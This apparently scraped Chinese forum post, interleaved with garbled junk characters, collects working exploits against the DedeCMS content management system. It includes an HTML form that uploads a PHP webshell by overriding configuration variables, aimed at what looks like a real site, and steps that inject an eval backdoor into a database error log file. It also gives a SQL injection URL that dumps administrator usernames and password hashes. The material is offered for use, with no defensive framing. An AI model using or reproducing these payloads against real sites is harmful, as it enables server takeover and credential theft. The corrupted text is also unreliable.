5 B/ O4 ^1 n5 ]$ U8 m. N% |织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
2 X& F4 U$ J- F9 U- q) t<html>+ A, _4 R4 i2 ]& E# g+ m
<head>
' d" ~/ |8 e; o! ]+ }; o7 D, m<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
% R) C. V1 [# E/ U& r" @</head>5 |, Z/ `) N- j& C* O! A
<body style="FONT-SIZE: 9pt">) n) f4 b5 `, u8 U- _' |1 i0 P: b
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />; v) P2 w0 S' C" t
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
3 C2 d8 O* S* d% N4 r<input type='hidden' name='activepath' value='/data/cache/' />
0 {8 I( l: i J! {, P* v<input type='hidden' name='cfg_basedir' value='../../' />5 g3 x5 r" c1 I$ s$ [% m1 X9 U
<input type='hidden' name='cfg_imgtype' value='php' />" P( j0 F D z
<input type='hidden' name='cfg_not_allowall' value='txt' />
7 f/ ]$ y3 A* _0 [) c<input type='hidden' name='cfg_softtype' value='php' />
: ` |8 y# D2 Y" `3 t. g<input type='hidden' name='cfg_mediatype' value='php' />4 R% ]! K( f8 v/ j1 z
<input type='hidden' name='f' value='form1.enclosure' />
5 G$ E1 _. z" x9 G, a o<input type='hidden' name='job' value='upload' />0 Q1 B5 E) C; H7 }$ e8 Y
<input type='hidden' name='newname' value='fly.php' />
/ _( E) |3 z9 T# u2 gSelect U Shell <input type='file' name='uploadfile' size='25' />7 R# U( B! H5 X" u/ W( c
<input type='submit' name='sb1' value='确定' />
# y1 U7 a, z5 D9 \+ \7 b: F5 [2 f</form>
* C: [( e0 d1 W8 j2 V6 G6 d- D<br />It's just a exp for the bug of Dedecms V55...<br />. P+ d1 z- G+ |$ g6 ^- n6 e
Need register_globals = on...<br />1 A4 L( Y% w3 S4 |" N/ G4 |4 ]- k
Fun the game,get a webshell at /data/cache/fly.php...<br />
) `, P: R2 L8 ?* r- I+ K</body>
2 O9 Z; W* x) G$ e+ e r# E</html>% `+ Z4 i& c) k/ \2 t% t) E
9 O* d8 v* {" s$ n+ r1 Z4 g4 S* f; ?
2 [: M( h3 l8 o) j- e, E* @
6 d- h C/ o" I1 \7 Q) |5 _8 n6 _- |
% u6 J' @% b- ?; X9 b8 g8 c, [
4 }$ r, {. C* S! B3 V- e$ p# J! v
* ?3 k T" b: L$ W5 q+ v
, d A& F P; i6 {* S+ E, j8 I* U) Q, z# {0 }4 |
9 I* x$ k/ ]6 m) h3 ]织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞) h3 [& D3 ~' ]" j/ L3 k# d D4 L* C
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。& N. s, [ ~* o" w: Z* b: _2 F
1. 访问网址:
+ K5 n! Z6 V! U! k/ Q7 ]& d+ w/ ahttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>2 P$ C: L! ~ H4 p; K! u/ X# [
可看见错误信息
& C/ ~' ]* x8 e/ j7 c0 ~
/ r- B$ [9 T, m# p* p
3 ^7 i4 h: N: E) V9 U& }2 z& n2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。) ?3 Q. q3 e: L+ G! z
int(3) Error: Illegal double '1024e1024' value found during parsing: o* ^$ f2 [0 B+ M# d
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
$ P; q' S2 p0 E
2 g- x# x3 s6 u4 M/ {% B3 p4 N
, i7 L$ E, I/ m. c3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是/ W7 i, V; `! H+ a8 u7 m
# B2 p! M$ {$ o* e' T' v! S% J
9 w; B+ v4 f! g/ N: x<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
6 _; R; [0 C3 R9 A4 u
. S; p: O2 ~9 `2 s, I
1 i9 o0 [( z( D按确定后的看到第2步骤的信息表示文件木马上传成功.$ z% C% j+ e/ j l
" Q4 L4 K" I! Q* G- n/ a& g$ z( A* t5 D$ e/ D
}, \- E! v) S' A2 I# w! R o' h
$ ^& N. w/ Z. O$ t' Y k
5 ^* t' L6 ^0 k* n A* \6 d7 A# |* S; I6 F/ H% c
2 v _! k1 ]3 Z6 T
- ^7 P3 u" ~0 v6 E. ~5 L2 W
2 r7 G& P9 |( c, H& v& A$ @/ |) @2 i# E
! V `6 @; U1 d& B( _, W& {. ?6 K
G8 A" h9 ` W1 k1 `! }- m% C) S6 D织梦(DedeCms)plus/infosearch.php 文件注入漏洞. K" h2 b% h% V6 m6 L9 k8 K
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|